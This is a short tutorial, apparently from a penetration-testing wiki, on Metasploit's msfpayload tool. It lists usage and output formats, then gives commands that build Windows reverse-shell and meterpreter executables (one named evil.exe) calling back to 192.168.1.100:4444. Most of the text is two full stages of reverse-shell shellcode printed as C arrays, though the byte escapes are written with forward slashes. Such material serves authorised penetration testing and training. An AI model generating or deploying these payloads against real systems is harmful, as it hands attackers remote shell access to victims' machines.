Used to generate different types of payloads.

---

Brief Tutorial

Location:

/pentest/exploit/framework3

Usage:

./msfpayload <payload> <variable=value> <output type>

output type:
S     summary and options of payload
C     C language
P     Perl
y     Ruby
R     Raw, allows payload to be piped into msfencode and other tools
J     JavaScript
X     Windows executable
V     VBA

Examples:

Create a reverse shell payload that is executable:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 X > evil.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
 Length: 278
Options: LHOST=192.168.1.100,LPORT=4444

Create a meterpreter payload that is executable:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 X > meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LHOST=192.168.1.100

Create a reverse shell payload in C:

The stager (reverse | bind) loads the stage (shell | vnc | meterpreter)

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 C
/*
 * windows/shell/reverse_tcp - 278 bytes (stage 1)
 * http://www.metasploit.com
 * EXITFUNC=seh, LPORT=4444, LHOST=192.168.1.100
 */
unsigned char buf[] = 
"/xfc/xe8/x56/x00/x00/x00/x53/x55/x56/x57/x8b/x6c/x24/x18/x8b"
"/x45/x3c/x8b/x54/x05/x78/x01/xea/x8b/x4a/x18/x8b/x5a/x20/x01"
"/xeb/xe3/x32/x49/x8b/x34/x8b/x01/xee/x31/xff/xfc/x31/xc0/xac"
"/x38/xe0/x74/x07/xc1/xcf/x0d/x01/xc7/xeb/xf2/x3b/x7c/x24/x14"
"/x75/xe1/x8b/x5a/x24/x01/xeb/x66/x8b/x0c/x4b/x8b/x5a/x1c/x01"
"/xeb/x8b/x04/x8b/x01/xe8/xeb/x02/x31/xc0/x5f/x5e/x5d/x5b/xc2"
"/x08/x00/x5e/x6a/x30/x59/x64/x8b/x19/x8b/x5b/x0c/x8b/x5b/x1c"
"/x8b/x1b/x8b/x5b/x08/x53/x68/x8e/x4e/x0e/xec/xff/xd6/x89/xc7"
"/x53/x68/x54/xca/xaf/x91/xff/xd6/x81/xec/x00/x01/x00/x00/x50"
"/x57/x56/x53/x89/xe5/xe8/x1f/x00/x00/x00/x90/x01/x00/x00/xb6"
"/x19/x18/xe7/xa4/x19/x70/xe9/xec/xf9/xaa/x60/xd9/x09/xf5/xad"
"/xcb/xed/xfc/x3b/x57/x53/x32/x5f/x33/x32/x00/x5b/x8d/x4b/x18"
"/x51/xff/xd7/x89/xdf/x89/xc3/x8d/x75/x14/x6a/x05/x59/x51/x53"
"/xff/x34/x8f/xff/x55/x04/x59/x89/x04/x8e/xe2/xf2/x2b/x27/x54"
"/xff/x37/xff/x55/x28/x31/xc0/x50/x50/x50/x50/x40/x50/x40/x50"
"/xff/x55/x24/x89/xc7/x68/xc0/xa8/x01/x64/x68/x02/x00/x11/x5c"
"/x89/xe1/x6a/x10/x51/x57/xff/x55/x20/x6a/x40/x5e/x56/xc1/xe6"
"/x06/x56/xc1/xe6/x08/x56/x6a/x00/xff/x55/x0c/x89/xc3/x6a/x00"
"/x56/x53/x57/xff/x55/x18/xff/xd3";

/*
 * windows/shell/reverse_tcp - 474 bytes (stage 2)
 * http://www.metasploit.com
 */
unsigned char buf[] = 
"/x68/x33/x32/x00/x00/x68/x57/x53/x32/x5f/x57/xfc/xe8/x4c/x00"
"/x00/x00/x60/x8b/x6c/x24/x28/x8b/x45/x3c/x8b/x7c/x05/x78/x01"
"/xef/x8b/x4f/x18/x8b/x5f/x20/x01/xeb/xe3/x30/x49/x8b/x34/x8b"
"/x01/xee/x31/xc0/x99/xac/x84/xc0/x74/x07/xc1/xca/x0d/x01/xc2"
"/xeb/xf4/x3b/x54/x24/x24/x75/xe3/x8b/x5f/x24/x01/xeb/x66/x8b"
"/x0c/x4b/x8b/x5f/x1c/x01/xeb/x03/x2c/x8b/x89/x6c/x24/x1c/x61"
"/xc2/x08/x00/x6a/x30/x59/x64/x8b/x31/x8b/x76/x0c/x8b/x76/x1c"
"/xad/x8b/x58/x08/x5e/x53/x68/x8e/x4e/x0e/xec/xff/xd6/x97/x53"
"/x56/x57/x8d/x44/x24/x10/x50/xff/xd7/x50/x50/x50/x68/xb6/x19"
"/x18/xe7/xff/xd6/x97/x68/xa4/x19/x70/xe9/xff/xd6/x95/x68/x08"
"/x92/xe2/xed/xff/xd6/x50/x57/x55/x83/xec/x10/x89/xe5/x89/xee"
"/x6a/x01/x6a/x00/x6a/x0c/x89/xe1/x6a/x00/x51/x56/xad/x56/x53"
"/x68/x80/x8f/x0c/x17/xff/x55/x20/x89/xc7/xff/xd0/x89/xe0/x6a"
"/x00/x50/x8d/x75/x08/x56/x8d/x75/x0c/x56/xff/xd7/x68/x43/x4d"
"/x44/x00/x89/xe2/x31/xc0/x8d/x7a/xac/x6a/x15/x59/xf3/xab/x83"
"/xec/x54/xc6/x42/xbc/x44/x66/xc7/x42/xe8/x01/x01/x8b/x75/x08"
"/x89/x72/xfc/x89/x72/xf8/x8b/x75/x04/x89/x72/xf4/x8d/x42/xbc"
"/x54/x50/x51/x51/x51/x41/x51/x49/x51/x51/x52/x51/x53/x68/x72"
"/xfe/xb3/x16/xff/x55/x20/xff/xd0/x31/xc0/xb4/x04/x96/x29/xf4"
"/x89/xe7/x6a/x64/x53/x68/xb0/x49/x2d/xdb/xff/x55/x20/xff/xd0"
"/x31/xc0/x50/x57/x50/x50/x50/xff/x75/x0c/x53/x68/x11/xc4/x07"
"/xb4/xff/x55/x20/xff/xd0/x85/xc0/x74/x74/x31/xc0/x3b/x07/x74"
"/x36/xe8/x77/x00/x00/x00/x50/x89/xe1/x50/x51/x56/x57/xff/x75"
"/x0c/x53/x68/x16/x65/xfa/x10/xff/x55/x20/xff/xd0/x85/xc0/x74"
"/x50/x31/xc0/x59/x39/xc8/x74/x11/x50/x51/x57/xff/x75/x28/xff"
"/x55/x10/x31/xc9/x39/xc8/x7c/x3a/xeb/xab/x89/xe0/xe8/x3f/x00"
"/x00/x00/x31/xc0/x50/x56/x57/xff/x75/x28/xff/x55/x14/x31/xc9"
"/x39/xc8/x7c/x86/x74/x1e/x51/x89/xe2/x51/x52/x50/x57/xff/x75"
"/x00/x53/x68/x1f/x79/x0a/xe8/xff/x55/x20/xff/xd0/x85/xc0/x74"
"/x05/x31/xc0/x59/xeb/xc8/x53/x68/xf0/x8a/x04/x5f/xff/x55/x20"
"/x31/xc9/x51/xff/xd0/x50/x54/x68/x7e/x66/x04/x80/xff/x75/x28"
"/xff/x55/x18/x85/xc0/x58/x75/xe0/xc3";